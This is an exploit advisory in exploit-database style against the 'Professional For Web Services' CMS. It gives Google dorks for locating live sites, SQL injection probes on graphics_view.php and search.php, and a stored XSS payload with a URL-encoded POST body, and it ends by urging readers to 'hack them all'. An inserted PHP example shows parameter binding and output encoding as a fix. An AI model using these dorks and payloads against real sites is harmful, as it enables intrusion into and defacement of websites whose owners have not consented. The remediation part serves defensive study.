# Exploit Title: [Iraq Professional For Web Services Multiple Vulnerabilities]
# Google Dorks: [ intext:Powered by Professional For Web Services - بدعم من بروفشنال لخدمات المواقع ]
# [ inurl:/graphics_view.php?details=]
# Date: [1-8-2015]
# Exploit Author: [R3NW4]
# Platform: (WebApps)
# Vendor Homepage [http://www.iraqiprof.com/]
# Version: [All versions]
# Tested on: [Linux(Debian)]
# Greetz: MuhmadEmad - Razor X Blade - All Kurdish Hackers
# the professionals have been exploited :D
-----------------------
SQL injection: ( doesn't work in the higher versions :( )
site.com/graphics_view.php?details=4
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '= 1 and active = 1' at line 1
-----------------------
SQLi From POST:
go to:
site.com/search.php
and in search field just type: '
and we get:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
hack it with Live HTTP Headers :)
-----------------------
Stored XSS
go to /search.php and in search field type:
"'/>><img src=x onerror=alert(/XSS_HERE/)>
or send POST request to /search.php with this data:
search=%22%27%2F%3E%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS_Here%2F%29%3E&select=news&button=%D8%A7%D8%A8%D8%AD%D8%AB
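Added example, not part of the original advisory and not the vendor's code: one way to handle the `details` parameter and the search term safely in PHP, using bound parameters for both queries and HTML encoding wherever the term is echoed. The `news` table, its columns and the function names are hypothetical, and an in-memory SQLite database via PDO stands in for MySQL so the script runs offline.

```php
<?php
// Added example. Table, columns and function names are hypothetical;
// in-memory SQLite (pdo_sqlite) stands in for the MySQL backend.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, active INTEGER)');
$pdo->exec("INSERT INTO news (title, active) VALUES ('Exam schedule', 1), ('100% attendance', 1), ('Draft', 0)");

// graphics_view.php?details=... : accept only a positive integer, then bind it.
function fetchItem(PDO $pdo, $details): ?array
{
    $id = filter_var($details, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // rejected before any SQL is built
    }
    $stmt = $pdo->prepare('SELECT id, title FROM news WHERE id = :id AND active = 1');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// search.php : the term is bound, never concatenated; LIKE wildcards in the
// term are escaped with '!' so user-supplied % and _ match literally.
function searchNews(PDO $pdo, string $term): array
{
    $like = '%' . strtr($term, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';
    $stmt = $pdo->prepare("SELECT id, title FROM news WHERE active = 1 AND title LIKE :q ESCAPE '!'");
    $stmt->execute([':q' => $like]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Encode on output wherever the search term or stored text reaches HTML.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: the quote and the markup string from the advisory.
var_dump(fetchItem($pdo, "4'"));          // non-integer input
var_dump(fetchItem($pdo, '2'));           // valid id
var_dump(searchNews($pdo, "'"));          // quote is data, not SQL syntax
var_dump(searchNews($pdo, '100%'));       // % matched literally
$probe = "\"'/>><img src=x onerror=alert(/XSS_HERE/)>";
echo '<p>Results for: ', e($probe), "</p>\n";
```

The raw MySQL error text shown in the sections above also tells a visitor about the query structure, so production error display should be turned off and errors logged server-side instead.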
------------------------
Demos:
Hack them all :)
more in google :D
-------------------------
# this is kurdish hackerz revolution,Freedom For Kurdistan
# https://twitter.com/R3NW4